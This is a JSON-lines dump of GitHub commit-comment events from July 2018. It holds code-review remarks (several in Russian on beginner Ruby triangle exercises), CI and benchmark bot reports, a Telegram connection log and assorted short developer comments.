{"id":"7998100872","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787327,"position":2,"line":2,"path":"Lesson_1/Площадь_треугольника.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:54:23Z","updated_at":"2018-07-21T05:54:23Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти навзвания диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п.\r\n"}},"created_at":"2018-07-21T05:54:23Z"}
{"id":"7998102794","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787335,"position":10,"line":10,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:56:17Z","updated_at":"2018-07-21T05:56:17Z","author_association":"NONE","body":"это не теорема Пифагора ) у тебя происходит умножение на 2, а должно быть возведение во вторую степень"}},"created_at":"2018-07-21T05:56:17Z"}
{"id":"7998102953","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787336,"position":10,"line":10,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:56:31Z","updated_at":"2018-07-21T05:56:31Z","author_association":"NONE","body":"скобки не нужны"}},"created_at":"2018-07-21T05:56:31Z"}
{"id":"7998103111","type":"CommitCommentEvent","actor":{"login":"taoyouxian"},"repo":{"name":"hyperledger/fabric-samples"},"payload":{"comment":{"id":29787337,"position":null,"line":null,"path":null,"commit_id":"dd12f88dc0d48b44b799b3a223b2b6a581fb78f7","created_at":"2018-07-21T05:56:42Z","updated_at":"2018-07-21T05:56:42Z","author_association":"NONE","body":"@ryjones  Thanks for your reply, great!"}},"created_at":"2018-07-21T05:56:42Z"}
{"id":"7998103662","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787339,"position":null,"line":null,"path":null,"commit_id":"b610295505df1ba95ce79cfc5cd43a92730b6b5a","created_at":"2018-07-21T05:57:19Z","updated_at":"2018-07-21T05:57:19Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.35%25-green.png)</a>\n"}},"created_at":"2018-07-21T05:57:19Z"}
{"id":"7998103988","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787340,"position":13,"line":13,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T05:57:40Z","updated_at":"2018-07-21T05:57:40Z","author_association":"NONE","body":"We dont need single function which does everything. this needs to be split into \r\n```\r\ncreate_card (org_name, board_name, list_name, card_name );\r\nadd_card_comment(card_name, card_comment);\r\nadd_card_desc(card_name, card_desc);\r\n```\r\nand ur test.py will have all three functions.\r\nthe advantage with this way is lets say if i want to add another description. I dont have to look into this library code, i just need to call add_desc() again. and it will be done. otherwise i need to understand what ur library does and change ur library which is developer time consuming.\r\n\r\ninfact much more professional way to do this is \r\n```\r\nref =  get_list_reference(org_name, board_name, list_name) // this will store these three values in a map and returns it as ref. do this only if you need to pass all the above three arguments to add_card_comment everytime. otherwise the 1st way is fine.\r\ncreate_card (ref, card_name );\r\nadd_card_comment(ref, card_name, card_comment);\r\nadd_card_desc(ref, card_name, card_desc);\r\n```"}},"created_at":"2018-07-21T05:57:40Z"}
{"id":"7998104499","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787344,"position":12,"line":12,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:58:13Z","updated_at":"2018-07-21T05:58:13Z","author_association":"NONE","body":"если треугольник прямоугольный и его катеты равны, то он равнобедренный и при этом прямоугольный треугольник не может быть равносторонним, поэтому последняя проверка не имеет смысла"}},"created_at":"2018-07-21T05:58:13Z"}
{"id":"7998106991","type":"CommitCommentEvent","actor":{"login":"Sakitoshi"},"repo":{"name":"Sakitoshi/retropie-crt-tvout"},"payload":{"comment":{"id":29787359,"position":null,"line":null,"path":null,"commit_id":"c07189136a2055f99369790f980804fddfd69408","created_at":"2018-07-21T06:00:37Z","updated_at":"2018-07-21T06:00:37Z","author_association":"OWNER","body":"also cleaned a little the code and try to avoid accidental activations."}},"created_at":"2018-07-21T06:00:37Z"}
{"id":"7998107185","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"hapijs/cryptiles"},"payload":{"comment":{"id":29787360,"position":4,"line":4,"path":"package.json","commit_id":"bd1eba1b7feed6768cce68c1e5aa298a8f5caef3","created_at":"2018-07-21T06:00:46Z","updated_at":"2018-07-21T06:00:46Z","author_association":"NONE","body":" BSD-3-cg"}},"created_at":"2018-07-21T06:00:46Z"}
{"id":"7998107507","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787364,"position":17,"line":17,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T06:01:03Z","updated_at":"2018-07-21T06:01:03Z","author_association":"NONE","body":"эта проверка, если ее делать (по ТЗ она в общем-то не нужна), должна быть записано иначе\r\nтекущая проверка проверяет только одну пару, а равнобедренность возможна в одном из трех вариантов a == b, a == c, b == c - в любом из этих случаев треугольник будет равнобедренный\r\n"}},"created_at":"2018-07-21T06:01:03Z"}
{"id":"7998107935","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"hapijs/cryptiles"},"payload":{"comment":{"id":29787370,"position":null,"line":null,"path":null,"commit_id":"bd1eba1b7feed6768cce68c1e5aa298a8f5caef3","created_at":"2018-07-21T06:01:26Z","updated_at":"2018-07-21T06:01:26Z","author_association":"NONE","body":"J.s"}},"created_at":"2018-07-21T06:01:26Z"}
{"id":"7998109316","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787377,"position":17,"line":17,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T06:02:47Z","updated_at":"2018-07-21T06:02:47Z","author_association":"NONE","body":"вторая проверка этой строки лишняя, потому что равносторонний треугольник должен быть отсеян в 15 строке\r\nт.е. до 17 строки программа доберется только если не выполнится проверка на равностороннесть и значит поторно проверять эту \"неравностороннесть\" не имеет смысла"}},"created_at":"2018-07-21T06:02:47Z"}
{"id":"7998109946","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787380,"position":20,"line":20,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T06:03:27Z","updated_at":"2018-07-21T06:03:27Z","author_association":"NONE","body":"здесь можно еще добавить, что он не прямоугольный )"}},"created_at":"2018-07-21T06:03:27Z"}
{"id":"7998110189","type":"CommitCommentEvent","actor":{"login":"ajlowndes"},"repo":{"name":"jupitercow/Registrations-for-WooCommerce"},"payload":{"comment":{"id":29787382,"position":null,"line":null,"path":null,"commit_id":"56fcd35c192b38d950a98f9de6ea9b67333edf05","created_at":"2018-07-21T06:03:42Z","updated_at":"2018-07-21T06:03:42Z","author_association":"NONE","body":"Just fyi... it looks like you deleted everything then committed it?"}},"created_at":"2018-07-21T06:03:42Z"}
{"id":"7998111159","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787386,"position":12,"line":12,"path":"Lesson_1/Прямоугольный_треугольник_2.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T06:04:47Z","updated_at":"2018-07-21T06:04:47Z","author_association":"NONE","body":"лучше избавляться от вложенных условий, там где это возможно\r\nздесь это несложно сделать\r\nнаиболее правильное решение - все проверки записать в одном линейном блоке, без вложенных условий"}},"created_at":"2018-07-21T06:04:47Z"}
{"id":"7998111519","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29787387,"position":null,"line":null,"path":null,"commit_id":"c37ccc69ecd236a035bfb7c085a4eab246c5bbff","created_at":"2018-07-21T06:05:09Z","updated_at":"2018-07-21T06:05:09Z","author_association":"OWNER","body":"Loading a replay which took four seconds before now takes less than half a second.\r\n\r\nAlso added handling for keyboard interrupts, although I'm not certain it was necessary."}},"created_at":"2018-07-21T06:05:09Z"}
{"id":"7998111745","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"hapijs/cryptiles"},"payload":{"comment":{"id":29787388,"position":6,"line":5,"path":"package.json","commit_id":"bd1eba1b7feed6768cce68c1e5aa298a8f5caef3","created_at":"2018-07-21T06:05:21Z","updated_at":"2018-07-21T06:05:21Z","author_association":"NONE","body":"C"}},"created_at":"2018-07-21T06:05:21Z"}
{"id":"7998115023","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"anhuiyimiaolianjie/iOS-tech-frontier"},"payload":{"comment":{"id":29787392,"position":null,"line":null,"path":null,"commit_id":"29b8e843286f57a43b02066279f1de0e4d23f501","created_at":"2018-07-21T06:08:32Z","updated_at":"2018-07-21T06:08:32Z","author_association":"NONE","body":"English"}},"created_at":"2018-07-21T06:08:32Z"}
{"id":"7998115819","type":"CommitCommentEvent","actor":{"login":"charithnik1993"},"repo":{"name":"charithnik1993/Question-Hub"},"payload":{"comment":{"id":29787395,"position":null,"line":null,"path":null,"commit_id":"7728e24cf2362b0c38c651ce9c435c225fad069d","created_at":"2018-07-21T06:09:21Z","updated_at":"2018-07-21T06:09:21Z","author_association":"OWNER","body":"create a new class  library to hold all the class."}},"created_at":"2018-07-21T06:09:21Z"}
{"id":"7998116277","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"anhuiyimiaolianjie/iOS-tech-frontier"},"payload":{"comment":{"id":29787396,"position":55,"line":55,"path":"翻译项目协作流程.md","commit_id":"29b8e843286f57a43b02066279f1de0e4d23f501","created_at":"2018-07-21T06:09:51Z","updated_at":"2018-07-21T06:09:51Z","author_association":"NONE","body":"Pull request"}},"created_at":"2018-07-21T06:09:51Z"}
{"id":"7998117493","type":"CommitCommentEvent","actor":{"login":"ghMtfSxx"},"repo":{"name":"GavinYellow/SharpSCADA"},"payload":{"comment":{"id":29787397,"position":null,"line":null,"path":null,"commit_id":"c2e1f583d55cef02b7587fd8d161ef9ba72653cd","created_at":"2018-07-21T06:11:05Z","updated_at":"2018-07-21T06:11:05Z","author_association":"NONE","body":"sdfgdf"}},"created_at":"2018-07-21T06:11:05Z"}
{"id":"7998118867","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29787402,"position":5,"line":6,"path":"src/app.html","commit_id":"b5d9d78c6b696f5ad65cce0ee99170e6bc4148e6","created_at":"2018-07-21T06:12:15Z","updated_at":"2018-07-21T06:12:15Z","author_association":"COLLABORATOR","body":"Let's go ahead and drop the `dir=\"${theme.rtltr}\"` on everything except the root element, in this case the page container on line 5."}},"created_at":"2018-07-21T06:12:15Z"}
{"id":"7998119080","type":"CommitCommentEvent","actor":{"login":"dangirsh"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":29787403,"position":null,"line":null,"path":null,"commit_id":"0d0a9d238850ce675d894b250a70074b5bda0c11","created_at":"2018-07-21T06:12:25Z","updated_at":"2018-07-21T06:12:25Z","author_association":"NONE","body":"This breaks the workflow for people with tiling window managers like xmonad where new windows (frames) are tiled by default. For example, if an emacs window is taking up the new screen, the completion frame will always split the screen 50/50, instead of float near the point. \r\n\r\nAs an xmonad user, I'm now forced to set all new emacs frames to float by default. They can still be tiled manually afterwards, but this fixes helm for me. \r\n\r\nThere's a lot of cool work being done with child frames, so I'm thankful for this breaking change for finally pushing me to fix my window manager config:\r\n\r\n```haskell\r\nmyManageHook :: ManageHook\r\nmyManageHook = composeAll . concat $\r\n    [\r\n      [ className =? c --> doFloat | c <- myClassFloats ]\r\n    ]\r\n    where\r\n         myClassFloats = [\"Emacs\"]\r\n```\r\n\r\nThen, set the hook in the top-level `xmonad` call:\r\n\r\n```haskell\r\nmanageHook = manageHook def <+> myManageHook\r\n```"}},"created_at":"2018-07-21T06:12:25Z"}
{"id":"7998121340","type":"CommitCommentEvent","actor":{"login":"zenuavsolutions"},"repo":{"name":"zenuavsolutions/Mavlink_Passthrough_Widget"},"payload":{"comment":{"id":29787407,"position":null,"line":null,"path":null,"commit_id":"590d54f8db1011ed18be365086a81c98f1f17e29","created_at":"2018-07-21T06:14:33Z","updated_at":"2018-07-21T06:14:33Z","author_association":"OWNER","body":"added IMU Temperature on ID 0x5001 on the last 6 Bits as implemented here:\r\nhttps://github.com/ArduPilot/ardupilot/pull/8690"}},"created_at":"2018-07-21T06:14:33Z"}
{"id":"7998121854","type":"CommitCommentEvent","actor":{"login":"atctakunomi"},"repo":{"name":"atctakunomi/atctakunomi.github.io"},"payload":{"comment":{"id":29787409,"position":null,"line":null,"path":null,"commit_id":"ef026f83e61b3481daa0c7e75d40c88263a359b0","created_at":"2018-07-21T06:15:03Z","updated_at":"2018-07-21T06:15:03Z","author_association":"OWNER","body":"マー君追加　safariで動作するか"}},"created_at":"2018-07-21T06:15:03Z"}
{"id":"7998122782","type":"CommitCommentEvent","actor":{"login":"tcurdt"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29787412,"position":50,"line":95,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"3d2a68e02a1abc471df316f029f8e69322b572e2","created_at":"2018-07-21T06:15:53Z","updated_at":"2018-07-21T06:15:53Z","author_association":"OWNER","body":"Glad I waited with the release :) Thanks!\r\nWill add a test case for the API (probably on Monday) and then switch them around -  unless you beat me to it."}},"created_at":"2018-07-21T06:15:53Z"}
{"id":"7998123596","type":"CommitCommentEvent","actor":{"login":"rudreshrm05"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787413,"position":13,"line":13,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T06:16:44Z","updated_at":"2018-07-21T06:16:44Z","author_association":"OWNER","body":"you are right bro ill make those changes....\r\nbut 'ref' is not needed because it needs only card_id to update comment and desc of a card\r\nThanks for the review: )"}},"created_at":"2018-07-21T06:16:44Z"}
{"id":"7998126019","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29787420,"position":8,"line":18,"path":"src/_app.mobile.scss","commit_id":"b5d9d78c6b696f5ad65cce0ee99170e6bc4148e6","created_at":"2018-07-21T06:19:20Z","updated_at":"2018-07-21T06:19:20Z","author_association":"COLLABORATOR","body":"So I'm not 100% sure what's going on here. I recommend using the order style only as an override to the mobile css. I can envision three scenarios with three implementations.\r\n\r\n1. You want the menu ltr (nav links on the left) in English and rtl (on the right) in Hebrew.\r\n2. You want the menu ltr or rtl all the time.\r\n3. You want 1 (or 2) in desktop and 2 (or 1) in mobile\r\n\r\nFor (1), it should just work without overriding the theme. For (2), you should override the direction in the CSS or on the element. For (3), you should override the direction in the mobile (or desktop) styles."}},"created_at":"2018-07-21T06:19:20Z"}
{"id":"7998126490","type":"CommitCommentEvent","actor":{"login":"rudreshrm05"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787426,"position":44,"line":44,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T06:19:48Z","updated_at":"2018-07-21T06:19:48Z","author_association":"OWNER","body":"ok bro..."}},"created_at":"2018-07-21T06:19:48Z"}
{"id":"7998126753","type":"CommitCommentEvent","actor":{"login":"angusbeefsteak"},"repo":{"name":"angusbeefsteak/angusbeefsteak.github.io"},"payload":{"comment":{"id":29787427,"position":null,"line":null,"path":null,"commit_id":"80497449f2716b817378cc1524a7242120b81414","created_at":"2018-07-21T06:20:05Z","updated_at":"2018-07-21T06:20:05Z","author_association":"OWNER","body":"that typo tho"}},"created_at":"2018-07-21T06:20:05Z"}
{"id":"7998127014","type":"CommitCommentEvent","actor":{"login":"rudreshrm05"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787428,"position":51,"line":51,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T06:20:19Z","updated_at":"2018-07-21T06:20:19Z","author_association":"OWNER","body":"ok bro..\r\n"}},"created_at":"2018-07-21T06:20:19Z"}
{"id":"7998127064","type":"CommitCommentEvent","actor":{"login":"xt0680"},"repo":{"name":"xt0680/LOLwebsite"},"payload":{"comment":{"id":29787429,"position":2,"line":2,"path":"FFF.txt","commit_id":"85017a7f2dd97ad6d3ed9ad538be09cba9799964","created_at":"2018-07-21T06:20:22Z","updated_at":"2018-07-21T06:20:22Z","author_association":"OWNER","body":"Bad"}},"created_at":"2018-07-21T06:20:22Z"}
{"id":"7998127288","type":"CommitCommentEvent","actor":{"login":"paaaa"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":29787430,"position":null,"line":null,"path":null,"commit_id":"e9e40cb13ea942b148b259c083fb3364a0cd90ea","created_at":"2018-07-21T06:20:35Z","updated_at":"2018-07-21T06:20:35Z","author_association":"NONE","body":"**### Jump to other ip can not connect   successfully @DrKLO **\r\n/org.telegram.messenger.beta V/FA: Inactivity, disconnecting from the service\r\n07-21 11:47:25.772 28242-28310/org.telegram.messenger.beta D/mytgnet: connection(0x766b1e70, dc2, type 1) disconnected with reason 2\r\n    connection(0x766b1e70, dc2, type 1) reconnect\r\n07-21 11:47:26.392 28242-28443/org.telegram.messenger.beta D/dalvikvm: GC_FOR_ALLOC freed 958K, 6% free 17641K/18632K, paused 22ms, total 22ms\r\n07-21 11:47:26.633 28242-28443/org.telegram.messenger.beta W/System.err: java.io.FileNotFoundException: https://google.com\r\n        at com.android.okhttp.internal.http.HttpURLConnectionImpl.getInputStream(HttpURLConnectionImpl.java:186)\r\n        at com.android.okhttp.internal.http.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:246)\r\n        at org.telegram.tgnet.ConnectionsManager$DnsLoadTask.doInBackground(ConnectionsManager.java:775)\r\n        at org.telegram.tgnet.ConnectionsManager$DnsLoadTask.doInBackground(ConnectionsManager.java:759)\r\n        at android.os.AsyncTask$2.call(AsyncTask.java:288)\r\n07-21 11:47:26.643 28242-28443/org.telegram.messenger.beta W/System.err:     at java.util.concurrent.FutureTask.run(FutureTask.java:237)\r\n        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1112)\r\n        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:587)\r\n        at java.lang.Thread.run(Thread.java:841)\r\n07-21 11:47:26.783 28242-28310/org.telegram.messenger.beta D/mytgnet: connection(0x766b1e70, dc2, type 1) connecting ()\r\n    timer(0x750f0fe0) call\r\n07-21 11:47:27.013 28242-28310/org.telegram.messenger.beta D/mytgnet: got address 104.233.21.22 and port 443 for dc4\r\n    wrap in layer 17TL_help_getConfig\r\n    dc4 handshake: begin\r\n    connection(0x7a977678, dc4, type 1) connecting (104.233.21.22:443)"}},"created_at":"2018-07-21T06:20:35Z"}
{"id":"7998127321","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787431,"position":13,"line":13,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T06:20:37Z","updated_at":"2018-07-21T06:20:37Z","author_association":"NONE","body":"then create_card should return me card_id, and there should be a function which takes card_name as argument and gives me card_id"}},"created_at":"2018-07-21T06:20:37Z"}
{"id":"7998127516","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29787432,"position":4,"line":27,"path":"src/services/theme.ts","commit_id":"b5d9d78c6b696f5ad65cce0ee99170e6bc4148e6","created_at":"2018-07-21T06:20:49Z","updated_at":"2018-07-21T06:20:49Z","author_association":"COLLABORATOR","body":"This is confusing to me. It is also redundant as it is computed off rtltr. I'm not sure how this is being used exactly."}},"created_at":"2018-07-21T06:20:49Z"}
{"id":"7998128151","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29787434,"position":null,"line":null,"path":null,"commit_id":"4d9639134b90dd996b9413a3b841473d2636a67f","created_at":"2018-07-21T06:21:27Z","updated_at":"2018-07-21T06:21:27Z","author_association":"OWNER","body":"Some specific things will still be printed, but this seems to eliminate some measurable overhead."}},"created_at":"2018-07-21T06:21:27Z"}
{"id":"7998137954","type":"CommitCommentEvent","actor":{"login":"davismj"},"repo":{"name":"haimavni/gbs"},"payload":{"comment":{"id":29787455,"position":5,"line":35,"path":"src/styles.scss","commit_id":"647f1b7b526f2058c327c76383557d28f16094e5","created_at":"2018-07-21T06:30:44Z","updated_at":"2018-07-21T06:30:44Z","author_association":"COLLABORATOR","body":"This was the right change to make to get rid of the extra scroll bar issue."}},"created_at":"2018-07-21T06:30:44Z"}
{"id":"7998139101","type":"CommitCommentEvent","actor":{"login":"prashanthcosmic"},"repo":{"name":"prashanthcosmic/sut"},"payload":{"comment":{"id":29787460,"position":7,"line":65,"path":"keeper.go","commit_id":"655d4a2034a3022ce8be36f6260454afbea574d7","created_at":"2018-07-21T06:31:44Z","updated_at":"2018-07-21T06:31:44Z","author_association":"OWNER","body":"dsgfd"}},"created_at":"2018-07-21T06:31:44Z"}
{"id":"7998139177","type":"CommitCommentEvent","actor":{"login":"greyson-signal"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29787461,"position":null,"line":null,"path":null,"commit_id":"6a090bd5f1d78ee1cf144a93644f4ddb93a5ab83","created_at":"2018-07-21T06:31:49Z","updated_at":"2018-07-21T06:31:49Z","author_association":"CONTRIBUTOR","body":"@PiCob Are you using a non-default font size? Using a big font can make the compose box taller."}},"created_at":"2018-07-21T06:31:49Z"}
{"id":"7998139672","type":"CommitCommentEvent","actor":{"login":"FDirectionClear"},"repo":{"name":"FDirectionClear/sunmmerTran"},"payload":{"comment":{"id":29787462,"position":null,"line":null,"path":null,"commit_id":"4918e5651fc8810de6d393a2fed1295c51c0523f","created_at":"2018-07-21T06:32:20Z","updated_at":"2018-07-21T06:32:20Z","author_association":"OWNER","body":"这第一次修改改得好"}},"created_at":"2018-07-21T06:32:20Z"}
{"id":"7998140307","type":"CommitCommentEvent","actor":{"login":"dnddnjs"},"repo":{"name":"reinforcement-learning-kr/pg_travel"},"payload":{"comment":{"id":29787463,"position":null,"line":null,"path":null,"commit_id":"93d8d45fbd936ecc63aef2726ad13fdd716583fb","created_at":"2018-07-21T06:32:58Z","updated_at":"2018-07-21T06:32:58Z","author_association":"MEMBER","body":"#2 hyper-params를 argparser로 설정할 수 있도록 변경 --> 완료"}},"created_at":"2018-07-21T06:32:58Z"}
{"id":"7998140868","type":"CommitCommentEvent","actor":{"login":"jmtatsch"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29787464,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-21T06:33:30Z","updated_at":"2018-07-21T06:33:30Z","author_association":"COLLABORATOR","body":"You are right. Latest commit should be better."}},"created_at":"2018-07-21T06:33:30Z"}
{"id":"7998141060","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29787466,"position":null,"line":null,"path":null,"commit_id":"1d3c9c8651ee48ee7e27fe478d369b707c1efb10","created_at":"2018-07-21T06:33:43Z","updated_at":"2018-07-21T06:33:43Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/1d3c9c8651ee48ee7e27fe478d369b707c1efb10#commitcomment-29786836) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/64e4fa775444ee296387c63b51d9518b808522ec/daily_2018_7_21/report.md). cc @ararslan"}},"created_at":"2018-07-21T06:33:43Z"}
{"id":"7998141267","type":"CommitCommentEvent","actor":{"login":"Sen-666"},"repo":{"name":"Sen-666/HAHAHA"},"payload":{"comment":{"id":29787467,"position":null,"line":null,"path":null,"commit_id":"bf0f3e128e51fd1d47d5a14886f0867dc9f721c5","created_at":"2018-07-21T06:33:56Z","updated_at":"2018-07-21T06:33:56Z","author_association":"OWNER","body":"gg"}},"created_at":"2018-07-21T06:33:56Z"}
{"id":"7998142153","type":"CommitCommentEvent","actor":{"login":"goermezer"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29787468,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-21T06:34:46Z","updated_at":"2018-07-21T06:34:46Z","author_association":"NONE","body":"Ja, bin aber gerade im Urlaub. Ab Di. bin ich wieder da...\n\nMit freundlichen Grüßen\nMustafa Görmezer\n\njmtatsch <notifications@github.com> schrieb am Sa., 21. Juli 2018, 08:33:\n\n> You are right. Latest commit should be better.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EliasKotlyar/Xiaomi-Dafang-Hacks/commit/67da745397afc8632b83842eb89a8195d6565484#commitcomment-29787464>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASTJy_03_MCJg9rKIxFEoACxPtsqNu9cks5uIss9gaJpZM4VY7Nu>\n> .\n>\n"}},"created_at":"2018-07-21T06:34:46Z"}
{"id":"7998150020","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29787503,"position":null,"line":null,"path":null,"commit_id":"7220e6503e8053f3d53ccc481f73691983e61d44","created_at":"2018-07-21T06:42:17Z","updated_at":"2018-07-21T06:42:17Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T06:42:17Z"}
{"id":"7998152125","type":"CommitCommentEvent","actor":{"login":"Globik"},"repo":{"name":"ferusinfo/libpqExample"},"payload":{"comment":{"id":29787508,"position":null,"line":null,"path":null,"commit_id":"cdbfeefdc3f9d1e4b281de8667d9e630da8a6865","created_at":"2018-07-21T06:44:21Z","updated_at":"2018-07-21T06:44:21Z","author_association":"NONE","body":"It would be nice also to see a completly asynchronous behaver."}},"created_at":"2018-07-21T06:44:21Z"}
{"id":"7998155674","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787520,"position":null,"line":null,"path":null,"commit_id":"e00edb1db1e85ccb62ee51c7b6fcc96a0b29926a","created_at":"2018-07-21T06:47:34Z","updated_at":"2018-07-21T06:47:34Z","author_association":"COLLABORATOR","body":"Notification shade shortcut > Verknüpfung Benachrichtigungsleiste"}},"created_at":"2018-07-21T06:47:34Z"}
{"id":"7998157287","type":"CommitCommentEvent","actor":{"login":"hongseoungpill"},"repo":{"name":"hj0030205/Github-3"},"payload":{"comment":{"id":29787524,"position":null,"line":null,"path":null,"commit_id":"d96b652a94782d6b78a6882ca749ee69ba10407c","created_at":"2018-07-21T06:49:02Z","updated_at":"2018-07-21T06:49:02Z","author_association":"COLLABORATOR","body":"오 확인이욤"}},"created_at":"2018-07-21T06:49:02Z"}
